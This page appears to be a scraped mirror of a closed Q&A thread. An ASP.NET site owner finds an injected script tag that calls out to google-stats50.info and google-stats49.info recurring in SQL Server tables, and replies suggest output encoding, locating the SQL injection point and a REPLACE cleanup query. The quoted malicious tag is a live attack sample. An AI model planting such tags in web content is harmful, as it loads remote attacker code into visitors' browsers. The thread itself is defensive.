开发者

XSS Attack on the ASP.NET Website [closed]

问答 作者:
It's difficult to tell what is being asked here. This question is ambiguous, vague, incomplete, overly broad, or rhetorical and cannot be reasonably answered in its current form. For help clarifying this question so that it can be reopened, visit the help center. Closed 12 years ago.

I am in a very big trouble. Please help!!!!!!!!!!

My website has been attacked by some malicious script < / title> < script src = http : // google-stats50.info/ur.php >. This script is appended to any column(s) of some table automatically. I have removed this script. But after a few hours, it re-appeared in some tables. But this time it is < / title> <开发者_StackOverflow中文版; script src = http : // google-stats49.info/ur.php >.

My client is complaining about the script. Technology used is ASP.NET 1.1, SQL SERVER 2005.

Please help.

Thanks in advance!!!!!!

When you render the text from the database you can use two ways to avoid this script.

  1. User Server.HtmlEncode(DataFromDatabase);
  2. Use the Microsoft Anti-Cross dll library that have a similar function with more options.

Last MS Anti-XSS library now is 3.1.
How to using video

How they pass this script.

  1. On the contact or other forms.
  2. On the browser reference on the statistics and when they browse your site, you keep a log about this and when you go to see this log the script is running.

Hope this help.

Shut down the site. Your server may or may not be screwed now.

You have to find out where the changes are coming from - Database or File system

If it's the DB then you may be ok, someone is probably using sql injection. Set permissions so that the DB cannot be updated by the site for now until you find the SQL INJECTION point.

If it's your file system then you probably need to clear and reset the site. They are in and you won't get rid of them. Find your entry point, but it will be hard.

I would recommend that you remove all extern hostheader binding in the IIS. That allows you to locate the problem locally without any client of yours might be infected/be stolen from

A Quick remedy

Following is not a solution, but with this you can remove the script from the database in a single query. Thats what i do for now :).

UPDATE Table_Name SET Column_Name = REPLACE(CAST(Column_Name AS nvarchar(MAX)), 'http://google-stats49.info/ur.php>', ' ')

This one works like the find and replace stuff in word. If you find any ware abouts about the virus script, do post it here.

Regards, Masood

same problem here... it started about 15.30 and infect 4 tables... here is solution for full database search: http://justgeeks.blogspot.com/2006/10/search-ms-sql-server-for-any-text.html just edit it to return distinct table names.

and this will work as Masood mention

UPDATE Table_Name SET Column_Name = REPLACE(CAST(Column_Name AS nvarchar(MAX)), 'stupid script', '')

继续阅读:asp.netsql-injectionsql-server

更多精彩内容

0

上一篇:

下一篇:

精彩评论

暂无评论...
登录 注册
Qedev.com
验证码 换一张
取 消

最新问答

问答排行榜

法律声明:本站内容均为网友上传,网站举办方负责审核和监督,

如存在版权或非法内容,欢迎举报,我们将尽快予以删除。

Copyright © 2018-2020 开发者. All rights reserved.

Powered by 开发者

ICP备案号: 京ICP备10032868号-9